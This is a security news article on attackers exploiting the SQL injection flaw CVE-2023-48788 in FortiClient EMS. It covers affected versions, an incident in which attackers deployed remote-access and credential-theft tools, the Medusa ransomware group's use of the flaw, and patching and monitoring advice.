Hackers Actively Exploiting Vulnerability in FortiClient EMS

Cybersecurity researchers have identified active exploitation of a critical vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Enterprise Management Server (EMS) software. This vulnerability arises from improperly filtered SQL queries, enabling attackers to execute unauthorized code or commands through SQL injection.

By exploiting this vulnerability, hackers can infiltrate enterprise networks and cause significant damage. Although patches have been released for this issue, attackers continue to exploit it globally.

The CVE-2023-48788 vulnerability affects the following versions of FortiClient EMS:

• 7.0.1 through 7.0.10
• 7.2.0 through 7.2.2

The vulnerability has been assigned a Common Vulnerability Scoring System (CVSS) score of 9.8, underscoring its severity. An unauthenticated attacker can exploit this issue by sending specially crafted data packets, leading to remote code execution (RCE).

The vulnerability was disclosed in March 2024, with patches released in versions 7.0.11 and 7.2.3. FortiClient EMS is commonly used as a centralized platform that allows internet access for remote connections. This exposure provides attackers with opportunities for initial access, reconnaissance, and deployment of malicious payloads.

In October 2024, Kaspersky’s Global Emergency Response Team (GERT) identified an attack on a Windows server that leveraged this vulnerability in version 7.0.1 of FortiClient EMS.

The attackers gained system access via SQL injection and deployed remote control tools like ScreenConnect and AnyDesk. They also used tools such as Mimikatz.exe to steal passwords and HRSword.exe to bypass security measures. Additional malicious payloads were downloaded using native Windows command files like certutil and curl.

Evidence of SQL injection attacks was found in FortiClient EMS logs (ems.log, sql_trace.log) and Microsoft SQL Server logs (ERRORLOG.X). The attackers exploited the xp_cmdshell function to execute unauthorized commands.

Threat intelligence has revealed widespread exploitation of CVE-2023-48788 across various regions and industries. Attackers primarily target systems to steal data, harvest credentials, and distribute ransomware. Notably, the Medusa ransomware group has used this vulnerability for initial access.

FortiClient EMS users must immediately update to the following versions:

• 7.0.11 or later
• 7.2.3 or later

Additional security measures include:

• Restricting direct internet access to FortiClient EMS servers.
• Monitoring network traffic for signs of exploitation (using IDS systems).
• Implementing endpoint protection platforms (EPP) on all devices.
• Configuring web application firewalls (WAF) to block malicious requests.
• Regularly reviewing system logs to detect suspicious activity.

The exploitation of CVE-2023-48788 highlights the critical importance of timely updates and implementing robust security measures. Organizations must regularly apply patches and adopt best practices to secure their infrastructure and enhance cybersecurity.